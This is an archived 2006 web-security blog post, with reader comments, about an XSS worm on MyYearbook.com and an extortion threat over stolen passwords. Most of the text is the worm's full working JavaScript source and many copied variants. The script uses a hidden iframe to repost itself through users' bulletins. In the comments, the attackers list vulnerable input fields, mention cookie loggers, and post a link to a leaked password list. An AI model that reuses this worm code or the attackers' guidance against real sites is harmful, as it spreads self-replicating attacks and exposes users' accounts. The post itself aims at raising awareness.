Full-disclosure extortion of MyYearbook.com ha.ckers.org web application security lab

Full-disclosure extortion of MyYearbook.com

MyYearbook.com’s woes continue. Unsticky emailed me the original source code to the MyYearbook.com worm. It’s funny how this reminds me of actual virus fighting, where understanding the original variant can help explain how future variants evolved. Here are the variants:

Original variant by unsticky:

new pics!<span id="bw" poet="unsticky"><img> me <script>function an(){tn=(twf.contentWindow||twf.contentDocument);if(tn.document){tn=tn.document;}return tn;}function ic(){twf=d.getElementById('bp');if(twf.onLoad=='pb()'){pb();}else if(twf.onLoad=='ef()'){ef();}else{frm=an();if(frm.body.innerHTML.indexOf(ttl)==-1){twf.onLoad='pb()';twf.src='/index.php?mysession=bWVzc2FnZXNfYnVsbGV0aW5fY29tcG9zZQ==';}}}function pb(){frm=an();sub=frm.getElementsByName('msg_subject')[0];msg=frm.getElementsByName('msg_body')[0];sub.value=ttl;msg.value='<span id="bw" poet="unsticky">'+d.getElementById('bw').innerHTML+'</span>';twf.onLoad='pl()';frm.forms[0].submit();}function ef(){}d=document;ttl='new pics!';</script><iframe id="bp" src="/index.php?mysession=bWVzc2FnZXNfYnVsbGV0aW5fY29tcG9zZQ==" onload="ic()" frameborder="0" height="0" width="0"></iframe></span>

Additional variants:

LMAO<span id="bw" poet="unsticky">Lol, This Script Is Funny As Hell. <script>function an(){tn=(twf.contentWindow||twf.contentDocument);if(tn.document){tn=tn.document;}return tn;}function ic(){twf=d.getElementById('bp');if(twf.onLoad=='pb()'){pb()}else if(twf.onLoad=='ef()'){ef()}else{frm=an();if(frm.body.innerHTML.indexOf(ttl)==-1){twf.onLoad='pb()';twf.src='/index.php?mysession=bWVzc2FnZXNfYnVsbGV0aW5fY29tcG9zZQ==';}}}function pb(){frm=an();sub=frm.getElementsByName('msg_subject')[0];msg=frm.getElementsByName('msg_body')[0];sub.value=ttl;msg.value='<span id='+a+'bw'+a+' poet='+a+'unsticky'+a+'>'+d.getElementById('bw').innerHTML+'</span>';twf.onLoad='ef()';frm.forms[0].submit();}function ef(){}d=document;a=String.fromCharCode(39);ttl='LMAO';</script><iframe id="bp" src="/index.php?mysession=bWVzc2FnZXNfYnVsbGV0aW5fY29tcG9zZQ==" ?="" onload="ic()" frameborder="0" height="0" width="0"></iframe></span>

read this NOW<span id="bw" poet="unsticky">IT is funny…it automattically reposts itself<script>function an(){tn=(twf.contentWindow||twf.contentDocument);if(tn.document){tn=tn.document;}return tn;}function ic(){twf=d.getElementById('bp');if(twf.onLoad=='pb()'){pb()}else if(twf.onLoad=='ef()'){ef()}else{frm=an();if(frm.body.innerHTML.indexOf(ttl)==-1){twf.onLoad='pb()';twf.src='/index.php?mysession=bWVzc2FnZXNfYnVsbGV0aW5fY29tcG9zZQ==';}}}function pb(){frm=an();sub=frm.getElementsByName('msg_subject')[0];msg=frm.getElementsByName('msg_body')[0];sub.value=ttl;msg.value='<span id='+a+'bw'+a+' poet='+a+'unsticky'+a+'>'+d.getElementById('bw').innerHTML+'</span>';twf.onLoad='ef()';frm.forms[0].submit();}function ef(){}d=document;a=String.fromCharCode(39);ttl='read this NOW';</script><iframe id="bp" src="/index.php?mysession=bWVzc2FnZXNfYnVsbGV0aW5fY29tcG9zZQ==" ?="" onload="ic()" frameborder="0" height="0" width="0"></iframe></span>

What does this mean….?<span id="bw" poet="unsticky">Sukina iro wa non de su ka? Its japanese you idiots. waht does it mean?? <script>function an(){tn=(twf.contentWindow||twf.contentDocument);if(tn.document){tn=tn.document;}return tn;}function ic(){twf=d.getElementById('bp');if(twf.onLoad=='pb()'){pb()}else if(twf.onLoad=='ef()'){ef()}else{frm=an();if(frm.body.innerHTML.indexOf(ttl)==-1){twf.onLoad='pb()';twf.src='/index.php?mysession=bWVzc2FnZXNfYnVsbGV0aW5fY29tcG9zZQ==';}}}function pb(){frm=an();sub=frm.getElementsByName('msg_subject')[0];msg=frm.getElementsByName('msg_body')[0];sub.value=ttl;msg.value='<span id='+a+'bw'+a+' poet='+a+'unsticky'+a+'>'+d.getElementById('bw').innerHTML+'</span>';twf.onLoad='ef()';frm.forms[0].submit();}function ef(){}d=document;a=String.fromCharCode(39);ttl='What does this mean….?';</script><iframe id="bp" src="/index.php?mysession=bWVzc2FnZXNfYnVsbGV0aW5fY29tcG9zZQ==" ?="" onload="ic()" frameborder="0" height="0" width="0"></iframe></span>

THIS ALWAYS HAPPENS<span id="bw" poet="unsticky">if i posted this its because heidi rocks my life<script>function an(){tn=(twf.contentWindow||twf.contentDocument);if(tn.document){tn=tn.document;}return tn;}function ic(){twf=d.getElementById('bp');if(twf.onLoad=='pb()'){pb()}else if(twf.onLoad=='ef()'){ef()}else{frm=an();if(frm.body.innerHTML.indexOf(ttl)==-1){twf.onLoad='pb()';twf.src='/index.php?mysession=bWVzc2FnZXNfYnVsbGV0aW5fY29tcG9zZQ==';}}}function pb(){frm=an();sub=frm.getElementsByName('msg_subject')[0];msg=frm.getElementsByName('msg_body')[0];sub.value=ttl;msg.value='<span id='+a+'bw'+a+' poet='+a+'unsticky'+a+'>'+d.getElementById('bw').innerHTML+'</span>';twf.onLoad='ef()';frm.forms[0].submit();}function ef(){}d=document;a=String.fromCharCode(39);ttl='THIS ALWAYS HAPPENS';</script><iframe id="bp" src="/index.php?mysession=bWVzc2FnZXNfYnVsbGV0aW5fY29tcG9zZQ==" ?="" onload="ic()" frameborder="0" height="0" width="0"></iframe></span><br />

Read If Your Sexy, <img src='http://ha.ckers.org/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> <span id="bw" poet="unsticky">im horny as hell, so come bang me hard<script>function an(){tn=(twf.contentWindow||twf.contentDocument);if(tn.document){tn=tn.document;}return tn;}function ic(){twf=d.getElementById('bp');if(twf.onLoad=='pb()'){pb()}else if(twf.onLoad=='ef()'){ef()}else{frm=an();if(frm.body.innerHTML.indexOf(ttl)==-1){twf.onLoad='pb()';twf.src='/index.php?mysession=bWVzc2FnZXNfYnVsbGV0aW5fY29tcG9zZQ==';}}}function pb(){frm=an();sub=frm.getElementsByName('msg_subject')[0];msg=frm.getElementsByName('msg_body')[0];sub.value=ttl;msg.value='<span id='+a+'bw'+a+' poet='+a+'unsticky'+a+'>'+d.getElementById('bw').innerHTML+'</span>';twf.onLoad='ef()';frm.forms[0].submit();}function ef(){}d=document;a=String.fromCharCode(39);ttl='Read If Your Sexy, <img src='http://ha.ckers.org/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> ';</script><iframe id="bp" src="/index.php?mysession=bWVzc2FnZXNfYnVsbGV0aW5fY29tcG9zZQ==" ?="" onload="ic()" frameborder="0" height="0" width="0"></iframe></span><br />

I want to have sex with you!<span id="bw" poet="unsticky">lol jk …no but this person just looked at Eric's pictures =)<script>function an(){tn=(twf.contentWindow||twf.contentDocument);if(tn.document){tn=tn.document;}return tn;}function ic(){twf=d.getElementById('bp');if(twf.onLoad=='pb()'){pb()}else if(twf.onLoad=='ef()'){ef()}else{frm=an();if(frm.body.innerHTML.indexOf(ttl)==-1){twf.onLoad='pb()';twf.src='/index.php?mysession=bWVzc2FnZXNfYnVsbGV0aW5fY29tcG9zZQ==';}}}function pb(){frm=an();sub=frm.getElementsByName('msg_subject')[0];msg=frm.getElementsByName('msg_body')[0];sub.value=ttl;msg.value='<span id='+a+'bw'+a+' poet='+a+'unsticky'+a+'>'+d.getElementById('bw').innerHTML+'</span>';twf.onLoad='ef()';frm.forms[0].submit();}function ef(){}d=document;a=String.fromCharCode(39);ttl='I want to have sex with you!';</script><iframe id="bp" src="/index.php?mysession=bWVzc2FnZXNfYnVsbGV0aW5fY29tcG9zZQ==" ?="" onload="ic()" frameborder="0" height="0" width="0"></iframe></span>

I want to have with you!<span id="bw" poet="unsticky">lol jk …no but this person just looked at Eric's pictures =)<script>function an(){tn=(twf.contentWindow||twf.contentDocument);if(tn.document){tn=tn.document;}return tn;}function ic(){twf=d.getElementById('bp');if(twf.onLoad=='pb()'){pb()}else if(twf.onLoad=='ef()'){ef()}else{frm=an();if(frm.body.innerHTML.indexOf(ttl)==-1){twf.onLoad='pb()';twf.src='/index.php?mysession=bWVzc2FnZXNfYnVsbGV0aW5fY29tcG9zZQ==';}}}function pb(){frm=an();sub=frm.getElementsByName('msg_subject')[0];msg=frm.getElementsByName('msg_body')[0];sub.value=ttl;msg.value='<span id='+a+'bw'+a+' poet='+a+'unsticky'+a+'>'+d.getElementById('bw').innerHTML+'</span>';twf.onLoad='ef()';frm.forms[0].submit();}function ef(){}d=document;a=String.fromCharCode(39);ttl='I want to have with you!';</script><iframe id="bp" src="/index.php?mysession=bWVzc2FnZXNfYnVsbGV0aW5fY29tcG9zZQ==" ?="" onload="ic()" frameborder="0" height="0" width="0"></iframe></span>

I want to with you!<span id="bw" poet="unsticky">lol jk …no but this person just looked at Eric's pictures =)<script>function an(){tn=(twf.contentWindow||twf.contentDocument);if(tn.document){tn=tn.document;}return tn;}function ic(){twf=d.getElementById('bp');if(twf.onLoad=='pb()'){pb()}else if(twf.onLoad=='ef()'){ef()}else{frm=an();if(frm.body.innerHTML.indexOf(ttl)==-1){twf.onLoad='pb()';twf.src='/index.php?mysession=bWVzc2FnZXNfYnVsbGV0aW5fY29tcG9zZQ==';}}}function pb(){frm=an();sub=frm.getElementsByName('msg_subject')[0];msg=frm.getElementsByName('msg_body')[0];sub.value=ttl;msg.value='<span id='+a+'bw'+a+' poet='+a+'unsticky'+a+'>'+d.getElementById('bw').innerHTML+'</span>';twf.onLoad='ef()';frm.forms[0].submit();}function ef(){}d=document;a=String.fromCharCode(39);ttl='I want to with you!';</script><iframe id="bp" src="/index.php?mysession=bWVzc2FnZXNfYnVsbGV0aW5fY29tcG9zZQ==" ?="" onload="ic()" frameborder="0" height="0" width="0"></iframe></span>

READ THIS<span id="bw" poet="unsticky">Check your bulletons =) <script>function an(){tn=(twf.contentWindow||twf.contentDocument);if(tn.document){tn=tn.document;}return tn;}function ic(){twf=d.getElementById('bp');if(twf.onLoad=='pb()'){pb()}else if(twf.onLoad=='ef()'){ef()}else{frm=an();if(frm.body.innerHTML.indexOf(ttl)==-1){twf.onLoad='pb()';twf.src='/index.php?mysession=bWVzc2FnZXNfYnVsbGV0aW5fY29tcG9zZQ==';}}}function pb(){frm=an();sub=frm.getElementsByName('msg_subject')[0];msg=frm.getElementsByName('msg_body')[0];sub.value=ttl;msg.value='<span id='+a+'bw'+a+' poet='+a+'unsticky'+a+'>'+d.getElementById('bw').innerHTML+'</span>';twf.onLoad='ef()';frm.forms[0].submit();}function ef(){}d=document;a=String.fromCharCode(39);ttl='READ THIS';</script><iframe id="bp" src="/index.php?mysession=bWVzc2FnZXNfYnVsbGV0aW5fY29tcG9zZQ==" ?="" onload="ic()" frameborder="0" height="0" width="0"></iframe></span>

Download<span id="bw" poet="unsticky">…Nirvana songs. Lots of them. Nirvana is a good band. Also download Offspring songs. They both rock more than you. Don't hate. You know they do. This will repost itself, by the way. Sorry to be a bother. I'm not like the other idiots. you wanna send hate mail, send it to me, the person that started this bulliten. My page is http://www.myYearbook.com/theoffspringiscoolerthanyou/ . I'm only doing this to say one thing, that being THE OFFSPRING AND NIRVANA ARE COOLER THAN YOU! And download their music. Nirvana, around the nevermind era. Offspring around the Smash/Ixnay era. Thank you!~Kat<script>function an(){tn=(twf.contentWindow||twf.contentDocument);if(tn.document){tn=tn.document;}return tn;}function ic(){twf=d.getElementById('bp');if(twf.onLoad=='pb()'){pb()}else if(twf.onLoad=='ef()'){ef()}else{frm=an();if(frm.body.innerHTML.indexOf(ttl)==-1){twf.onLoad='pb()';twf.src='/index.php?mysession=bWVzc2FnZXNfYnVsbGV0aW5fY29tcG9zZQ==';}}}function pb(){frm=an();sub=frm.getElementsByName('msg_subject')[0];msg=frm.getElementsByName('msg_body')[0];sub.value=ttl;msg.value='<span id='+a+'bw'+a+' poet='+a+'unsticky'+a+'>'+d.getElementById('bw').innerHTML+'</span>';twf.onLoad='ef()';frm.forms[0].submit();}function ef(){}d=document;a=String.fromCharCode(39);ttl='Download';</script><iframe id="bp" src="/index.php?mysession=bWVzc2FnZXNfYnVsbGV0aW5fY29tcG9zZQ==" ?="" onload="ic()" frameborder="0" height="0" width="0"></iframe></span>

read this NOW<span id="bw" poet="unsticky">Nirvana songs. Lots of them. Nirvana is a good band. Also download Offspring songs. They both rock more than you. Don't hate. You know they do. This will repost itself now that you've clicked on it. Just warning you!<script>function an(){tn=(twf.contentWindow||twf.contentDocument);if(tn.document){tn=tn.document;}return tn;}function ic(){twf=d.getElementById('bp');if(twf.onLoad=='pb()'){pb()}else if(twf.onLoad=='ef()'){ef()}else{frm=an();if(frm.body.innerHTML.indexOf(ttl)==-1){twf.onLoad='pb()';twf.src='/index.php?mysession=bWVzc2FnZXNfYnVsbGV0aW5fY29tcG9zZQ==';}}}function pb(){frm=an();sub=frm.getElementsByName('msg_subject')[0];msg=frm.getElementsByName('msg_body')[0];sub.value=ttl;msg.value='<span id='+a+'bw'+a+' poet='+a+'unsticky'+a+'>'+d.getElementById('bw').innerHTML+'</span>';twf.onLoad='ef()';frm.forms[0].submit();}function ef(){}d=document;a=String.fromCharCode(39);ttl='read this NOW';</script><iframe id="bp" src="/index.php?mysession=bWVzc2FnZXNfYnVsbGV0aW5fY29tcG9zZQ==" ?="" onload="ic()" frameborder="0" height="0" width="0"></iframe></span>

read this NOW<span id="bw" poet="unsticky">i wanted 2 try it myself and c if i can do it<script>function an(){tn=(twf.contentWindow||twf.contentDocument);if(tn.document){tn=tn.document;}return tn;}function ic(){twf=d.getElementById('bp');if(twf.onLoad=='pb()'){pb()}else if(twf.onLoad=='ef()'){ef()}else{frm=an();if(frm.body.innerHTML.indexOf(ttl)==-1){twf.onLoad='pb()';twf.src='/index.php?mysession=bWVzc2FnZXNfYnVsbGV0aW5fY29tcG9zZQ==';}}}function pb(){frm=an();sub=frm.getElementsByName('msg_subject')[0];msg=frm.getElementsByName('msg_body')[0];sub.value=ttl;msg.value='<span id='+a+'bw'+a+' poet='+a+'unsticky'+a+'>'+d.getElementById('bw').innerHTML+'</span>';twf.onLoad='ef()';frm.forms[0].submit();}function ef(){}d=document;a=String.fromCharCode(39);ttl='read this NOW';</script><iframe id="bp" src="/index.php?mysession=bWVzc2FnZXNfYnVsbGV0aW5fY29tcG9zZQ==" ?="" onload="ic()" frameborder="0" height="0" width="0"></iframe></span>

Additionally Triphase from Hacking With Style got ahold of me. This is a direct copy and paste from his email to me. (Btw, ha.ckers.org does not condone this sort of activity, but the 1000 or so users who will be affected by this have a right to know):

Hello Rsnake,

I saw your blogpost on ha.ckers.org

Our response:

Indeed we have a list of usernames and passwords… about 900+ not counting the ones coming in every second…
As a proof ill past a short list of them:

–snipped–
Anyways, the admin has about 20 hours left to fix the bug, or the list WILL get public.

Regards,
Triphase

It is clear that Triphase will use the lists that they have found against MyYearbook.com. This is an interesting take on full-disclosure, where the vulnerable website or application is told the duration of time they have until they have to disclose the information that has been stolen. Of course, this is not a new way to disclose information and it has been tried in the past, although I don’t recall it ever having been done in quite the same way. If MyYearbook.com does business in California this may fall under SB 1386 which mandates full disclosure by the owners to it’s users. Pretty nasty stuff and a pretty tough message - fix it or pay.

This entry was posted on Wednesday, July 5th, 2006 at 5:22 pm and is filed under XSS, Webappsec. You can leave a response as well.

11 Responses to “Full-disclosure extortion of MyYearbook.com”

Otsego Says:
July 5th, 2006 at 5:27 pm
Is that wise for you to post that? Those passwords could well be the ones that they have for their email addreses.
Luny Says:
July 5th, 2006 at 7:45 pm
Tough message indeed. I know i mentioned in my blog to update if I had heard anything else from Triphase and this HWS group, but after thinking about it and reading this last email I recieved, it’s clear they only want attention.
unsticky Says:
July 5th, 2006 at 8:32 pm
They didn’t do anything special. They probaly just put cookie loggers in the owners’ profiles, as Signatures. I’ve gotten a few account from the same thing, but I’m not threatening the site with that. What’s the good of releasing passwords to normal users accounts, as a threat? It doesn’t accomplish anything.
RSnake Says:
July 5th, 2006 at 8:54 pm
Otsego, I’m pretty certain Triphase was going to release this information with or without my post, and I am attempting to raise awareness of the threat of his actual disclosure, which is far more disturbing. I don’t think I did them any more harm than if he had posted that information elsewhere, and hopefully the word will get out quicker as a result.

Luny, I am in agreement about HWF’s intention of getting attention. Unfortunately they’ll get it if they start posting 1000’s of passwords, one way or another.

Unsticky, I would agree, there is nothing overly complex about what they are doing, it’s more about raising awareness of the threat of mass XSS worms. In a way this kind of thing is really tough love in some weird sort of way. Hurting the site you are interested in to get them to fix it. It shouldn’t have to be that hard.
blogged on » Archiv » MyYearbook.com XSS Wurm Says:
July 6th, 2006 at 5:53 am
[…] Den XSS-Wurm, seine Varianten und eine e-Mail des Verantwortlichen gibt’s auf ha.ckers.org […]
Triphase Says:
July 6th, 2006 at 7:34 am
unsticky:
The problem is that we DO have admin and owner accounts…
1 of the admins changed there account information.

But as it looks for now… they fixed the problem…
Well at least… 1 of them… They fixed my Perl exploit…
Now its time to wait for L4fu to get online and see if they fixed his exploit as well…

If they didnt… well you know what happens…

Regards,
Triphase
unsticky Says:
July 6th, 2006 at 8:48 am
My appologies then, I’m new to this ‘MyYearbook’ hacking bit. All I know is their incessant XSS vulns.

Hey, I just logged into my account on their site and was prompted by a change password screen, so maybe you guys are making a little bit of progress. haha
unsticky Says:
July 6th, 2006 at 9:12 am
I appologize for posting twice in a row, but I wanted to say that they upped their filters again. It seems they now strip element id’s, script: img src’s, and probably more, but that’s all I’ve found… If only I’d worked a little bit more on it last night, there would’ve been a friendly Signature worm too. Now to move onto new input feilds!
Triphase Says:
July 6th, 2006 at 9:21 am
There are about 20 input fields vuln to this XSS…
The personal page has a few, the “whatever i want” box is vuln…
The my picture comment, and the Your comment on other peoples pictures for a start… but there are lots more…

Regards,
Triphase
RSnake Says:
July 7th, 2006 at 10:19 am
I removed the passwords from the list as it is no longer required as proof. I haven’t heard anything about MyYearbook.com, so I assume they fixed the hole as there was no major disclosure mentioned.
Triphase Says:
July 8th, 2006 at 8:52 am
They fixed a few, but not all…
What they mostly did was a password change when you login…
When you login you will be asked to change your password.

Nice idea of them… but not good enough… we are still getting password every second and some security holes are still there…

the full list is now online at http://l4fu.phpnet.us/
or the direct link: l4fu.phpnet.us/fulllist.txt

Total passwords: 1234
Not a joke it realy is 1234

Full-disclosure extortion of MyYearbook.com

11 Responses to “Full-disclosure extortion of MyYearbook.com”

Respond here or Discuss On the Forums